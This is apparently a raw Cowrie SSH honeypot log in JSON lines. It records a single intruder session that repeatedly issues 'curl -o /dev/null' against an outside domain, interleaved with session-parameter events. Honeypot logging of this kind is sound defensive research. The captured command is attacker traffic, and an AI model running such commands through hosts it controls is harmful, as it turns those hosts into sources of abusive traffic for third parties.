{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.766751Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.805069Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.806064Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.843253Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.844284Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.881623Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.882596Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.925659Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.926749Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:27.965476Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:27.966467Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.014477Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.015997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.055252Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.056232Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.111243Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.112232Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.160951Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.162777Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.215302Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.216307Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.258918Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.260115Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.297493Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.298794Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.335694Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.336694Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.373681Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.374770Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.412761Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.413982Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.451053Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.452092Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.490396Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.491411Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.546937Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.548212Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.590775Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.591769Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.632462Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.633368Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.670223Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.671397Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.714790Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.715731Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.755135Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.756032Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.793835Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.795002Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.834739Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.835783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.878373Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.879445Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.917054Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.917991Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:28.967166Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:28.968208Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.055938Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.056875Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.094346Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.095338Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.134635Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.135551Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.172683Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.173580Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.240129Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.241059Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.279899Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.280807Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.318614Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.319758Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.356745Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.357794Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.397324Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.398542Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.446722Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.447996Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.485073Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.486116Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.549559Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.550557Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.695871Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.697368Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.753449Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.754391Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.791285Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.792268Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.832550Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.833543Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.870248Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.871247Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.920527Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.921453Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:29.966330Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:29.967489Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.017300Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.018378Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.056590Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.057652Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.163700Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.164783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.202407Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.203376Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.242196Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.243276Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.280684Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.281606Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.320308Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.321306Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.359382Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.360332Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.398169Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.398905Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.436811Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.437758Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.485572Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.486569Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.524187Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.525085Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.565339Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.566343Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.603183Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.604411Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.642025Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.642956Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.679719Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.680638Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.716945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.717838Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.755037Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
